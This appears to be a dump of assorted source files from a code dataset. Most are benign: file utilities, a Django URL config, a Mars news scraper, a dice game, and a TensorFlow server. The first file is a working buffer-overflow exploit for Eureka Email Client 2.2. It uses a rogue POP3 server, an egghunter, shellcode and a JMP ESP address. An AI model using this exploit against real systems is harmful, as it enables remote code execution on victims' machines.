index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
15,600 | 7661c3a37345af511178a4f1352036e935e10242 | #Eureka Email Client 2.2 XP SP3 Exploit
import socket
host = '192.168.1.10'
port = 110
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host,port))
s.listen(5)
except socket.error:
print 'Failed to create socket'
sys.exit()
print '[+] Listening for connections on port: {0}'.format(port)
# msf-egghunter -e suls -f python
egg = ""
egg += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c"
egg += "\x05\x5a\x74\xef\xb8\x73\x75\x6c\x73\x89\xd7\xaf\x75"
egg += "\xea\xaf\x75\xe7\xff\xe7"
# msfvenom -p windows/exec CMD=calc.exe -f python EXITFUNC=thread -b "\x00\xcc"
buf = ""
buf += "\xb8\x86\x91\xb8\x3d\xda\xc2\xd9\x74\x24\xf4\x5e\x33"
buf += "\xc9\xb1\x31\x83\xc6\x04\x31\x46\x0f\x03\x46\x89\x73"
buf += "\x4d\xc1\x7d\xf1\xae\x3a\x7d\x96\x27\xdf\x4c\x96\x5c"
buf += "\xab\xfe\x26\x16\xf9\xf2\xcd\x7a\xea\x81\xa0\x52\x1d"
buf += "\x22\x0e\x85\x10\xb3\x23\xf5\x33\x37\x3e\x2a\x94\x06"
buf += "\xf1\x3f\xd5\x4f\xec\xb2\x87\x18\x7a\x60\x38\x2d\x36"
buf += "\xb9\xb3\x7d\xd6\xb9\x20\x35\xd9\xe8\xf6\x4e\x80\x2a"
buf += "\xf8\x83\xb8\x62\xe2\xc0\x85\x3d\x99\x32\x71\xbc\x4b"
buf += "\x0b\x7a\x13\xb2\xa4\x89\x6d\xf2\x02\x72\x18\x0a\x71"
buf += "\x0f\x1b\xc9\x08\xcb\xae\xca\xaa\x98\x09\x37\x4b\x4c"
buf += "\xcf\xbc\x47\x39\x9b\x9b\x4b\xbc\x48\x90\x77\x35\x6f"
buf += "\x77\xfe\x0d\x54\x53\x5b\xd5\xf5\xc2\x01\xb8\x0a\x14"
buf += "\xea\x65\xaf\x5e\x06\x71\xc2\x3c\x4c\x84\x50\x3b\x22"
buf += "\x86\x6a\x44\x12\xef\x5b\xcf\xfd\x68\x64\x1a\xba\x97"
buf += "\x86\x8f\xb6\x3f\x1f\x5a\x7b\x22\xa0\xb0\xbf\x5b\x23"
buf += "\x31\x3f\x98\x3b\x30\x3a\xe4\xfb\xa8\x36\x75\x6e\xcf"
buf += "\xe5\x76\xbb\xac\x68\xe5\x27\x1d\x0f\x8d\xc2\x61"
while True:
c, addr = s.accept()
print '[+] Client connected: {0}'.format(addr[0])
print '[+] Sending Evil payload: {0}'.format(addr[0])
evil = "sulssuls"
evil += buf
evil += "A" * (711 - 8 - len(buf))
evil += "\x6b\x8c\x49\x7e" #7 E498C6B JMP ESP user32.dll
evil += "\x90" * 10
evil += egg # Egghunter
evil += "C" * (5000 - 711 - 4 - 10 - len(egg) )
payload = "-ERR " + evil + "\r\n"
#print(payload)
c.send(payload)
print repr(addr[1]) + ": " + c.recv(1024)
c.close()
|
15,601 | 9aaa6a49b1e4814994df0feb1edb609735818d3b | # -*- coding: utf-8 -*-
# -------------------------------------------------------------------------------
# Name:
# Purpose: This is to connect pygame to sxpNCPState
# Create Time: 2020/12/18 10:15
# Author: Xiaoping Sun xiaopingsun@gmail.com//971994252@qq.com
# Copyright: (c) t 2020
# Licence: <MIT licence>
# -------------------------------------------------------------------------------
#this file contains some classes that are to read text files
import codecs
import os,sys
import re
import pickle
import xlrd
import xlsxwriter
import joblib
import shutil
import json
dirstack = []
dirfile_list = []
total_len = 0
total_word = 0
import time
#this is to just make the current_one a back and then,save the latest one as current one
def coverbakcopythensave(fname,project_dict):
bkfname = fname + '.bak'
if os.path.exists(fname):
if os.path.exists(bkfname): #first check and remove last bak
os.remove(bkfname)
os.rename(fname,bkfname) #then copy current to bak
SaveObject(project_dict,fname) #finally, save new
def saveastimeversion(fname,dataobject):
tfname = makebaktimefilename(fname)
SaveObject(tfname,dataobject)
def replacewithnew(fname,fname_new,timebackdir):
dirname,lfname = os.path.split(fname)
tname = makebaktimefilename(lfname)
bakfullname = os.path.join(timebackdir,tname)
shutil.copy(fname,bakfullname)
os.remove(fname)
shutil.copy(fname_new,fname)
def makebaktimefilename(fname):
timestr ="--{0}".format( time.time())
tfname = fname + timestr
while(os.path.exists(tfname)):
timestr ="--{0}".format( time.time())
tfname = fname + timestr
return tfname
def makebaktimefilenamesuff(fname,suffix = '.zip'):
timestr ="{0}".format(time.time())
tfname = fname + timestr
while(os.path.exists(tfname)):
timestr ="{0}".format( time.time())
tfname = fname + timestr
return tfname + suffix
def traversedir(input_path,result,file_pat='\.py$'):
files = os.listdir(input_path)
for filename in files:
if os.path.isdir(input_path+'/'+filename):
traversedir(input_path+'/'+filename,result,file_pat)
else:
if matchpat(filename,file_pat):
result.append(input_path+'/'+filename)
def matchpat(filename,file_pat):
g = re.match(file_pat,filename)
if g:
return True
return False
def copydir(srcdir,trgdir):
try:
shutil.copytree(srcdir,trgdir)
return 'ok'
except Exception as e:
msg = 'copytree dir failed'+srcdir+str(e)
return msg
def deletedir(srcdir):
try:
shutil.rmtree(srcdir)
return 'ok'
except Exception as e:
msg = 'delete dir failed'+srcdir+str(e)
print(msg)
return msg
def SaveObject(ob,fname):
joblib.dump(ob,fname,compress=9)
def LoadObject(fname):
if os.path.exists(fname)==False:
print('not exists',fname)
return None
return joblib.load(fname)
def extractname(fullname):
name_dict={}
curr = os.getcwd()
drivename,remname=os.path.splitdrive(fullname)
dirname,filename=os.path.split(fullname)
name_dict['isdir']=os.path.isdir(fullname)
name_dict['drivename']= drivename
name_dict['remname']= remname
name_dict['currdir']=curr
name_dict['dirname']= dirname
name_dict['fname']= filename
return name_dict
def IsExsit(fname):
return os.path.exists(fname)
def CheckDir(dirstr):
if os.path.exists(dirstr) == False:
os.path.os.mkdir(dirstr)
print('ok, we make dir',dirstr)
print('ok',dirstr)
return dirstr
def CheckDelMkDir(dirstr):
if os.path.exists(dirstr) == False:
os.path.os.mkdir(dirstr)
print('ok, we make dir',dirstr)
else:
#os.removedirs(dirstr)
try:
shutil.rmtree(dirstr)
return dirstr
except Exception as e:
msg = 'delete dir failed'+dirstr+str(e)
print(msg)
return None
print('ok, we del origin one dir',dirstr)
os.path.os.mkdir(dirstr)
print('ok, we make dir',dirstr)
print('ok',dirstr)
return dirstr
def TestJsonDump():
json_dict = {}
urlrec = []
for i in range(10):
id =0;
for j in range(10):
urlitem = {'i':i,'j':j}
urlrec.append(urlitem)
json_dict['test']=urlrec
urlrecfile = 'test.json'
urlf = open(urlrecfile,'w+')
json.dump(urlrec,urlf)
urlf.close()
fname = 'json_dict.json'
StoreJsonDict(json_dict,fname)
def StoreJsonDict(json_dict,fname):
strjson = json.dumps(json_dict)
f = codecs.open(fname,'w+','utf-8')
f.write(strjson)
f.close
return 1
def ExtractJsonFromStr(jstr):
t=json.JSONDecoder().decode(jstr)
return t
def ReadJSonFromJSonFile(fname):
f=file(fname)
f = codecs.open(fname,'r','utf-8')
txt = f.read()
t=json.JSONDecoder().decode(txt)
return t
def ExtractJasonStr(jstr):
## pattern = r"var\sdata=(\{.*?\})";
## #but this won't work for nested brackets so we use another simple one
## ct = re.findall(pattern,str,0)# it will return '{hello}' in ct[0] for str='var data={hello};
ph = r'var\sdata='
pe = r'};'
str1 = re.sub(ph,'',jstr)
str2 = re.sub(pe,'}',str1)
return str2
def DeepSave(fname,ob):
joblib.dump(ob,fname,compress=9)
def CheckLoadDict(dirfile):
d ={}
if os.path.exists(dirfile)==True:
return joblib.load(dirfile)
return d
def CheckLoadList(dirfile):
d =[]
if os.path.exists(dirfile)==True:
return joblib.load(dirfile)
return d
def StoreSxptext(sxptxt, fname):
f = open(fname,'wb')
pickle.dump(sxptxt,f)
f.close()
def LoadSxptext(fname):
f = open(fname,'rb')
sxptxt = pickle.load(f)
f.close()
return sxptxt
def IsType(fname,typename):
fs = fname.split('.')
if fs[-1] == typename:
return True;
else:
return False
def GetDirFileList(filedir):
if not os.path.exists(filedir):
print('no dir to be read')
return []
filelist = []
files = os.listdir(filedir)
#now we first read each file in the txtPath
for f in files:
if os.path.isdir(os.path.join(filedir, f)):
pass
else:
filelist.append(f)
return filelist
def WriteExcel(fname, tableindex,rwstrset):
if not os.path.exists(fname):
print('file does not exists',fname)
return []
try:
workbook = xlsxwriter.Workbook(fname)
nsheet = len(rwstrset)
for eachtable in rwstrset:
worksheet = workbook.add_worksheet()
row = 0
for eachrw in eachtable:
col = 0
for eachcol in eachrw:
# ctype 0 empty,1 string, 2 number, 3 date, 4 boolean, 5 error
ctype = 1
xf = 0
value = str(eachcol)
worksheet.write(row, col, value)
col = col + 1
row = row + 1
print('row write ', row)
workbook.close()
except Exception as e:
print('error in writing excel',e)
def LoadExcel(fname,tableindex=0):
if not os.path.exists(fname):
print('file does not exists',fname)
return []
data = xlrd.open_workbook(fname)
table = data.sheets()[tableindex]
nrows = table.nrows
ncols = table.ncols
print('load', fname,nrows,ncols)
return table
def CountFileLineWord(filedir,ftype):
dirstack = []
dirfile_list = []
total_len = 0
total_word = 0
total_len, total_word = TraverseCountDir(filedir, ftype)
print('in ', filedir, ' you have: len, word are:')
print(total_len,total_word)
def GetDirFile(filedir,ftype):
if not os.path.exists(filedir):
print(filedir)
print('no dir to be read')
return 0,0
filelist = []
subdirlist = []
total_fnum = 0
total_type = 0
total_size = 0
dirstack = []
files = os.listdir(filedir)
#now we first read each file in the txtPath
subfile_dic ={}
for f in files:
df = os.path.join(filedir, f)
# print df, ' : ', os.path.isdir(df)
if os.path.isdir(df):
subdirlist.append(df)
dirstack.append(df.lower())
else:
filelist.append(f)
file_type_set =[]
for eachf in filelist:
ff = os.path.join(filedir, eachf).lower()
urttype = GetFileType(eachf)
total_fnum = total_fnum + 1
if urttype == ftype:
total_type = total_type + 1
file_type_set.append(ff)
return file_type_set
def CountFileNum(filedir,ftype):
if not os.path.exists(filedir):
print(filedir)
print('no dir to be read')
return 0,0,0
# print 'visit--->:',filedir, os.path.getmtime(filedir)
filelist = []
subdirlist = []
total_fnum = 0
total_type = 0
total_size = 0
dirstack = []
files = os.listdir(filedir)
#now we first read each file in the txtPath
subfile_dic ={}
for f in files:
df = os.path.join(filedir, f)
# print df, ' : ', os.path.isdir(df)
if os.path.isdir(df):
subdirlist.append(df)
dirstack.append(df.lower())
else:
filelist.append(f)
for eachf in filelist:
ff = os.path.join(filedir, eachf).lower()
urttype = GetFileType(eachf)
total_fnum = total_fnum + 1
if urttype == ftype:
total_type = total_type + 1
total_size = total_size + os.path.getsize(ff)
while len(subdirlist) > 0:
next_subdir = subdirlist.pop()
tl, tw,ts = CountFileNum(next_subdir,ftype)
total_fnum = total_fnum + tl
total_type = total_type + tw
total_size = total_size + ts
return total_fnum, total_type,total_size
def TraverseCountDir(filedir,ftype):
if not os.path.exists(filedir):
print(filedir)
print('no dir to be read')
return 0,0
# print 'visit--->:',filedir, os.path.getmtime(filedir)
filelist = []
subdirlist = []
total_len = 0
total_word = 0
dirstack = []
files = os.listdir(filedir)
#now we first read each file in the txtPath
subfile_dic ={}
for f in files:
df = os.path.join(filedir, f)
# print df, ' : ', os.path.isdir(df)
if os.path.isdir(df):
subdirlist.append(df)
dirstack.append(df.lower())
else:
filelist.append(f)
for eachf in filelist:
ff = os.path.join(filedir, eachf).lower()
urttype = GetFileType(eachf)
if urttype == ftype:
dirfile_list.append([ff,eachf])
txtlines = ReadTxtLines(ff)
lennum = len(txtlines)
wordnum = 0
for eachline in txtlines:
wds = eachline.split(' ')
wordnum = wordnum + len(wds)
print(lennum,wordnum,ff)
total_len = total_len + lennum
total_word = total_word + wordnum
while len(subdirlist) > 0:
next_subdir = subdirlist.pop()
tl, tw = TraverseCountDir(next_subdir,ftype)
total_len = total_len + tl
total_word = total_word + tw
return total_len, total_word
def GetFileType(fname):
ft = fname.split('.')
return ft[-1]
def GetURLFileType(urls):
patstr ='/{0,2}(\w+)(\.)(\w+)$'
pattern = re.compile(patstr)
match = pattern.search(urls)
pat_name= 'urltype'
pattern_pos = []
while match:
tg = match.groups()
tgtxt = match.group()
posd = match.span()
match = pattern.search(urls,posd[1])
return tg[2]
#pattern_pos.append([tgtxt,posd,tg[2],pat_name,1,0])
return ''
def StoreSxptext(sxptxt, fname):
f = open(fname,'wb')
pickle.dump(sxptxt,f)
f.close()
def LoadSxptext(fname):
f = open(fname,'rb')
sxptxt = pickle.load(f)
f.close()
return sxptxt
def cur_file_dir():
#获取脚本路径
path = sys.path[0]
#判断为脚本文件还是py2exe编译后的文件,如果是脚本文件,则返回的是脚本的目录,如果是py2exe编译后的文件,则返回的是编译后的文件路径
if os.path.isdir(path):
return path
elif os.path.isfile(path):
return os.path.dirname(path)
else:
return r'.'
rootdir = r'D:\pythonwork\code\axureui'
rootdir = r'./' #cur_file_dir()
print(('rootdir:', rootdir))
logfilename =rootdir + r'\weblog\log.txt'
indexpage = rootdir + r'\templates\index.html'
startuipage = rootdir + r'\templates\start.htm'
webfileroot = rootdir + r'\webfile'
webfilerootpattern = webfileroot.replace('\\','\\\\').lower()
def GetWebFilePathName(s):
patstr ='d:\\\\pythonwork\\\\code\\\\axureui\\\\webfile(.+)'
patstr =webfilerootpattern + '(.+)'
pattern_pos = []
pattern = re.compile(patstr)
match = pattern.search(s)
pat_name = 'url'
filesuffixpatstr = r''
while match:
tg = match.groups()
tgtxt = match.group()
posd = match.span()
match = pattern.search(s,posd[1])
pattern_pos.append([tgtxt,posd,tg,pat_name,1,0])
return tg[0]
print('')
def TraverseDir(filedir):
if not os.path.exists(filedir):
print('no dir to be read')
return []
# print 'visit--->:',filedir, os.path.getmtime(filedir)
filelist = []
subdirlist = []
files = os.listdir(filedir)
#now we first read each file in the txtPath
for f in files:
df = os.path.join(filedir, f)
# print df, ' : ', os.path.isdir(df)
if os.path.isdir(df):
subdirlist.append(df)
dirstack.append(df.lower())
else:
filelist.append(f)
for eachf in filelist:
if eachf == 'axQuery.std.js':
breakpoint = 1
ff = os.path.join(filedir, eachf).lower()
urlpath = GetWebFilePathName(ff)
if urlpath is None:
print('none in', ff)
else:
urttype = GetURLFileType(eachf)
webfile_dic[urlpath] = [ff,urttype]
dirfile_list.append([ff,eachf,urlpath])
while len(dirstack) > 0:
next_subdir = dirstack.pop()
TraverseDir(next_subdir)
return filelist, subdirlist
def GetDir(filedir):
if not os.path.exists(filedir):
print('no dir to be read')
return []
# print 'visit--->:',filedir, os.path.getmtime(filedir)
filelist = []
subdirlist = []
files = os.listdir(filedir)
#now we first read each file in the txtPath
for f in files:
df = os.path.join(filedir, f)
# print df, ' : ', os.path.isdir(df)
if os.path.isdir(df):
subdirlist.append(f)
else:
filelist.append(f)
return filelist, subdirlist
def WriteStrFile(filename,txtstr,encodetype='gbk'):
# ut = sxpTextEncode.GetUnicode(txtstr)
ut = txtstr
# ut = ut.encode('utf-8')
f = codecs.open(filename,'w+',encodetype)
f.write(ut)
f.close();
def ReadTextUTF(fname):
try:
f = codecs.open(fname,'r','utf-8')
txt = f.read()
f.close()
return txt
except IOError:
print('wrong in open')
return []
return textcontent
def ReadTextContent(fpathname):
try:
file = open(fpathname,'r')
textcontent = file.read()
file.close()
return textcontent
except IOError:
print('wrong in open')
return []
return textcontent
def ReadALL(fpathname):
print(fpathname)
try:
file = open(fpathname,'r')
lineset = [];
while 1:
lines = file.readlines(100000)
if not lines:
break
for line in lines:
print(line);
lineset = lineset + lines;
file.close()
return lineset
except IOError:
print('wrong in open')
file.close();
return []
return lines
def ReadTxtLines(fpathname):
try:
file = open(fpathname,'r')
lineset = [];
while 1:
line = file.readline()
if not line:
break
if len(line.strip())==0:
continue;
else:
lineset.append(line);
file.close()
return lineset
except IOError:
print('wrong in open')
file.close();
return []
return lines
def SaveTxtFile(fname,txt,encodetype='utf-8'):
try:
fileHandle =codecs.open(fname,'w','utf-8')
fileHandle.write(txt)
fileHandle.close()
except IOError as e:
print(fname)
print(('wrong in open',e))
def BackupTxtFile(fname):
txt = ReadTextUTF(fname)
fnamename = fname+'.bk'
i = 0
while(1):
if os.path.exists(fnamename):
fnamename = fnamename + '.bk'
i = i + 1
if i >=2:
fnamename = fname+ '.bk'
SaveTxtFile(fnamename,txt)
print('overlap the oldest fil:',fnamename)
break
else:
SaveTxtFile(fnamename,txt)
print('backup it to file:',fnamename)
break
def GetNewName(fname):
fnamename = fname+'(1)'
i = 0
while(1):
if os.path.exists(fnamename):
fnamename = fnamename + '.bk'
i = i + 1
if i >=10:
fnamename = fname+ '.bk'
print('overlap the oldest fil:',fnamename)
break
else:
print('backup it to file:',fnamename)
break
return fnamename
def TestCount():
dirstack = []
dirfile_list = []
total_len = 0
total_word = 0
filedir = r'E:\pythonworknew\code\textparse'
print(filedir)
print('--------------------- count source code')
ftype = 'py'
CountFileLineWord(filedir,ftype)
ftype = 'html'
CountFileLineWord(filedir,ftype)
print('---------------------count document num')
ftype = 'pdf'
filedir = r'D:\pythonwork\code\queryparse'
tf, specific_file_num,f_size= CountFileNum(filedir,ftype)
print('There are %.3f' % (f_size/1024/1024), 'Mbytes', 'for all', specific_file_num, ' of type: ', ftype)
ftype = 'pptx'
filedir = r'D:\pythonwork\code\queryparse'
tf, specific_file_num,f_size= CountFileNum(filedir,ftype)
print('There are %.3f' % (f_size/1024/1024), 'Mbytes', 'for all', specific_file_num, ' of type: ', ftype)
ftype = 'docx'
filedir = r'D:\pythonwork\code\queryparse'
tf, specific_file_num,f_size= CountFileNum(filedir,ftype)
print('There are %.3f' % (f_size/1024/1024), 'Mbytes', 'for all', specific_file_num, ' of type: ', ftype)
ftype = 'jpg'
filedir = r'D:\pythonwork\code\queryparse'
tf, specific_file_num,f_size= CountFileNum(filedir,ftype)
print('There are %.3f' % (f_size/1024/1024), 'Mbytes', 'for all', specific_file_num, ' of type: ', ftype)
def testcopy():
src = r'.\src\test'
trg = r'.\trg' #if using .\trg, the copydir will creat .\trg and copy all files and subdir
# of the 'src\test' to the .\trg, if .trg is already there, error reports, cause it will first
#create the target dir, so you do not have to create it
src = r'.\src\test'
trg = r'.\trg\test' #in this case, trg dir should be exists, and its sub dir
#test should be not exist so that they can create it in the \trg dir becore copying
#all files and sub dirs to the target dir.
copydir(src,trg)
def testre():
fn = r'E:\pythonworknew\code\emailman\testproject\sxpEmailMan.dpy'
pt = '(.+)\.py$'
g = re.match(pt,fn)
if g:
print(g.groups()[0])
else:
print('not matched')
CheckDelMkDir('E:\pythonworknew\code\emailman\zip')
def main():
# TestCount()
# TestCount()
# testcopy()
testre()
if __name__ == '__main__':
main()
|
15,602 | ef1baf7f1a103262c24a4b03f0327b46f9af5b29 | from django.urls import path
from products.models import Products
import csv
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('reset', views.reset, name='reset'),
]
def ready():
Products.objects.all().delete()
dataReader = csv.reader(open('intern-test-data.csv'), delimiter=',', quotechar='"')
next(dataReader)
for row in dataReader:
_, product = Products.objects.get_or_create(
product_name = row[0],
price = row[1],
dimension = row[2],
colours = row[3],
material = row[4],
image = row[5],
seen = False,
in_stock = True
)
out = Products.objects.get(product_name="Sofa 2 dudukan Vienna")
out.in_stock = False
out.save()
ready() |
15,603 | c4880b9cfb7c55c1494c7648cbf65d5616322a7d | def round_sum(a, b, c):
return round10(a) + round10(b) + round10(c)
def round10(x):
if x % 10 == 0:
return x
elif x % 10 >= 5:
return (x/10 + 1) * 10
elif x % 10 < 5:
return (x/10) * 10
|
15,604 | 28722b4c7334318dcdf0735050c6b4a67eda02c0 | from bs4 import BeautifulSoup as bs
import requests
from splinter import Browser
import time
import pandas as pd
def init_browser():
# @NOTE: Replace the path with your actual path to the chromedriver
executable_path = {"executable_path": "/Users/reena/Downloads/chromedriver"}
return Browser("chrome", **executable_path, headless=False)
def scrape_info():
browser = init_browser()
# Visit visitcostarica.herokuapp.com
url = "https://mars.nasa.gov/news/"
browser.visit(url)
time.sleep(1)
# Scrape page into Soup
html = browser.html
soup = bs(html, "html.parser")
# Get news title and paragraph text
news_title = soup.find('div', class_='content_title').get_text()
news_p = soup.find('div', class_='article_teaser_body').get_text()
print(news_title)
print(news_p)
# Get featured image url
url = "https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars"
browser.visit(url)
time.sleep(1)
html = browser.html
soup = bs(html, 'html.parser')
image = soup.find('div', class_='carousel_items').find('article')['style']
image_url = image.split("'")[1]
url_base = "https://www.jpl.nasa.gov"
featured_image_url = url_base + image_url
print(featured_image_url)
# Get mars facts
url = "https://space-facts.com/mars/"
tables = pd.read_html(url)
df2 = tables[1]
df2.columns = ["Parameter", "Values"]
table = df2.to_dict('records')
# Get mars hemispheres
url = "https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars"
url_base = "https://astrogeology.usgs.gov"
browser.visit(url)
time.sleep(1)
html = browser.html
soup = bs(html, 'html.parser')
result = soup.find_all('div', class_="item")
url_list = []
for y in result:
link = y.find('a')['href']
url_list.append(link)
hemisphere_image_urls = []
for x in url_list:
url1 = url_base + x
browser.visit(url1)
html = browser.html
soup = bs(html, 'html.parser')
time.sleep(1)
result1 = soup.find('img', class_="wide-image")
image = url_base + result1["src"]
result2 = soup.find('h2', class_='title')
title = result2.text
title = title.rsplit(' ', 1)[0]
mars_hemi = {"title": title, "img_url": image}
hemisphere_image_urls.append(mars_hemi)
print(hemisphere_image_urls)
# Store data in a dictionary
results = {
"news_title": news_title,
"news_p": news_p,
"featured_image_url": featured_image_url,
"table": table,
"hemisphere_image_urls": hemisphere_image_urls
}
# Close the browser after scraping
browser.quit()
print(results)
# Return results
return results
if __name__ == "__main__":
scrape_info()
|
15,605 | de9b7aaf3b9d088f1048b63a4436c8c1f93c65c5 | import json
import tensorflow as tf
with open('clusterSpec.json') as f:
clusterSpec = json.load(f)
cluster = tf.train.ClusterSpec(clusterSpec)
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.2)
sess_config = tf.ConfigProto(gpu_options=gpu_options)
# Start the server
server = tf.train.Server(cluster, config=sess_config)
# Hang on bro
server.join() |
15,606 | 881a82d2bab23058afaf0176631eb6cbffe66912 | def check(s1, s2):
"""check if they are one edit or zero edit away"""
l1 = len(s1)
l2 = len(s2)
if len(s1) == len(s2):
return check_update(s1, s2)
elif l1 + 1 == l2:
return check_insert(s1, s2)
elif l1 - 1 == l2:
return check_insert(s2, s1)
else:
return False
def check_update(s1, s2):
count_update = 0
for i in range(len(s1)):
if s1[i] != s2[i]:
count_update += 1
if count_update > 1:
return False
return True
def check_insert(s1, s2):
count_insert = 0
index1 = 0
index2 = 0
while index1 < len(s1):
if s1[index1] != s2[index2]:
index2 += 1
else:
index1 += 1
index2 += 1
return True
print(check('apple', 'aple'))
|
15,607 | 3d1c8dbc6e775bcb00c9d87f9a4e32f62f268c0b | # -*- coding: utf-8 -*-
"""
2017-10-19 18:25:23
使用random库,制作掷骰子猜大小游戏。
@author: liqian
"""
import random as rd
def xiazhu():
yourChoice=int(input("请下注(1代表大或0代表小)"))
if yourChoice==1:
yours="big"
return yours
elif yourChoice==0:
yours="small"
return yours
else:
print("请重新下注!")
xiazhu()
def touzi_game():
#print("》》》》游戏开始《《《《")
num_dice=int(input("请输入想使用筛子的数量,(最多为6个) : "))
if num_dice <=0:
print("筛子数量不能为0")
touzi_game()
elif num_dice>6:
print("筛子最多为6个")
touzi_game()
else:
print("掷筛子游戏:{}个筛子!".format(num_dice))
midNum=(num_dice*6)/2
print("游戏规则如下:")
print("大于等于{}为大,小余{}为小)".format(midNum,midNum))
yours=xiazhu()
print("你的下注是:",yours)
point_list=[0]*num_dice
count=0
while True:
point_list[count]=rd.randrange(1,6)
count=count+1
if count>num_dice-1:
break
# for p in range(0,num_dice-1):
# point_list[p]=int(rd.randrange(1,6))
for n in range(0,num_dice):
print("骰子{}是{}".format(n+1,point_list[n]))
sum_point=sum(point_list)
if sum_point>=midNum:
result="big"
else:
result="small"
print("总点数是",sum_point,result)
if yours=="small":
if result=="big":
print("you lose")
start()
else:
print("you win")
start()
else:
if result=="big":
print("you win")
start()
else:
print("you lose")
start()
def start():
jixu=int(input("继续玩游戏吗?(1是继续,0是结束)"))
# print(type(jixu))
if jixu==1:
print("》》》》游戏开始《《《《")
touzi_game()
else:
print("欢迎再来!")
start()
|
15,608 | 7582bd003f0220e4e79c4ecd31f7d3ca9ada0724 | import caffe
import lmdb
import numpy as np
import cv2, random
savepath = '../data/'
if not os.path.exists(savepath):
os.makedirs(savepath)
def crop_image(img):
crop_size = 224
range_h = img.shape[0] - crop_size
range_w = img.shape[1] - crop_size
y = random.randrange(0, range_h)
x = random.randrange(0, range_w)
return img[y : y + crop_size, x : x + crop_size]
def scale(im):
return cv2.resize(im, (256, 256))
size = 256.0
if im.shape[0] < im.shape[1]:
r = size / im.shape[0]
dim = (int(im.shape[1] * r), int(size))
else:
r = size / im.shape[1]
dim = (int(size), int(im.shape[0] * r))
return cv2.resize(im, dim)
style_pic = {}
train_pic = {}
validate_pic = {}
test_pic = {}
for key in range(20):
style_pic[key] = []
train_pic[key] = []
validate_pic[key] = []
test_pic[key] = []
with open('train.txt', 'r') as f:
content = f.read()[:-1]
for line in content.split('\n'):
t = line.split(' ')
style_pic[int(t[1])].append(t[0])
with open('test.txt', 'r') as f:
content = f.read()[:-1]
for line in content.split('\n'):
t = line.split(' ')
test_pic[int(t[1])].append(t[0])
for style in style_pic:
for i in range(30):
random.shuffle(style_pic[style])
train_pic[style] = style_pic[style][:-800]
validate_pic[style] = style_pic[style][-800:]
train_num = 0
validate_num = 0
test_num = 0
for style in train_pic:
train_num += len(train_pic[style])
for style in validate_pic:
validate_num += len(validate_pic[style])
for style in test_pic:
test_num += len(test_pic[style])
print train_num, validate_num, test_num
crop_number = 4
# Train
count = 0
print 'Train total ' + str(train_num * crop_number)
index = sorted(range(0, train_num * crop_number), key=lambda x: random.random())
in_db = lmdb.open(savepath + 'flickr-train-lmdb', map_size=int(1e12))
with in_db.begin(write=True) as in_txn:
for style in train_pic:
for pic in train_pic[style]:
pic_data = scale(cv2.imread(pic))
for _ in range(0, crop_number):
cropped = crop_image(pic_data).transpose((2,0,1))
im_dat = caffe.io.array_to_datum(cropped.astype('uint8'))
im_dat.label = int(style)
in_txn.put('{:0>10d}'.format(index.pop()), im_dat.SerializeToString())
count += 1
if count % 10000 == 0:
print count
assert(count == train_num * crop_number)
in_db.close()
# Validate
count = 0
print 'Validate total ' + str(validate_num * crop_number)
index = sorted(range(0, validate_num * crop_number), key=lambda x: random.random())
in_db = lmdb.open(savepath + 'flickr-validate-lmdb', map_size=int(1e12))
with in_db.begin(write=True) as in_txn:
for style in validate_pic:
for pic in validate_pic[style]:
pic_data = scale(cv2.imread(pic))
for _ in range(0, crop_number):
cropped = crop_image(pic_data).transpose((2,0,1))
im_dat = caffe.io.array_to_datum(cropped.astype('uint8'))
im_dat.label = int(style)
in_txn.put('{:0>10d}'.format(index.pop()), im_dat.SerializeToString())
count += 1
if count % 10000 == 0:
print count
assert(count == validate_num * crop_number)
in_db.close()
# Test
count = 0
print 'Test total ' + str(test_num)
in_db = lmdb.open(savepath + 'flickr-test-lmdb', map_size=int(1e12))
with in_db.begin(write=True) as in_txn:
for style in test_pic:
for pic in test_pic[style]:
pic_data = scale(cv2.imread(pic))
for _ in range(0, crop_number):
cropped = crop_image(pic_data).transpose((2,0,1))
im_dat = caffe.io.array_to_datum(cropped.astype('uint8'))
im_dat.label = int(style)
in_txn.put('{:0>10d}'.format(count), im_dat.SerializeToString())
count += 1
if count % 10000 == 0:
print count
assert(count == test_num * crop_number)
in_db.close()
|
15,609 | 8fbe11ff028bcd406c12817ff481a36b3beb0497 | from turtle import Turtle
from random import randint
class Food(Turtle):
def __init__(self):
super().__init__()
self.penup()
self.shape('circle')
self.shapesize(stretch_len = 0.25, stretch_wid = 0.25)
self.color('blue')
self.speed(0)
self.refresh()
def refresh(self):
self.goto(randint(-230,230),randint(-230,219))
|
15,610 | e81340d6d21dc25b0ac185c9150b14cb92c06bc3 | import os
import sys
import codecs
import re
from ansi2html import Ansi2HTMLConverter
from mtaac_package.CoNLL_file_parser import conll_file
from mtaac_package.common_functions import *
from cdliconll2conllu.converter import CdliCoNLLtoCoNLLUConverter
##from conllu.convert import convert as conllu2brat
from SPARQLTransformer import sparqlTransformer
'''
Not in use:
import rdflib
from SPARQLWrapper import SPARQLWrapper, JSON
'''
#
#---/ GENERAL COMMENTS /-------------------------------------------------------
#
'''
PIP DEPENDENCIES:
- mtaac_package (https://github.com/cdli-gh/mtaac-package)
- ansi2html
# - rdflib // not used
# - SPARQLWrapper // not used
OTHER DEPENDENCIES (Windows):
- http://www.oracle.com/technetwork/java/javase/downloads/
jdk8-downloads-2133151.html
WORKFLOW:
+ 1. CDLI-CoNLL (already there)
+ 2. CoNLL2RDF <https://github.com/acoli-repo/conll-rdf>
+ 3. RDF
+ 4. Syntactic Pre-annotator
+ 5. RDF2CoNLL
>? 6. CDLI-CoNLL2CoNLL-U
<https://github.com/cdli-gh/CDLI-CoNLL-to-CoNLLU-Converter)>
> 7. CoNLLU > Brat
8. Brat (push file to brat server)
(9. Editor corrects syntax)
10. Brat 2 CDLI-Conll
<https://github.com/cdli-gh/brat_to_cdli_CONLLconverter>
TODO:
+ check .sh scripts for missed steps
- columns should be adjusted for CDLI-CoNLL:
ID WORD MORPH2 POS IGNORE IGNORE IGNORE
- make sure columns are correctly designated for both formats
- make sure abbreviations are unified:
- either different rules for different abbreviations
OR
- better:
- apply your own abbr. unifier (lemmatization data scripts)
to make the data unified.
- then insure that the abbr. in SPARQL match
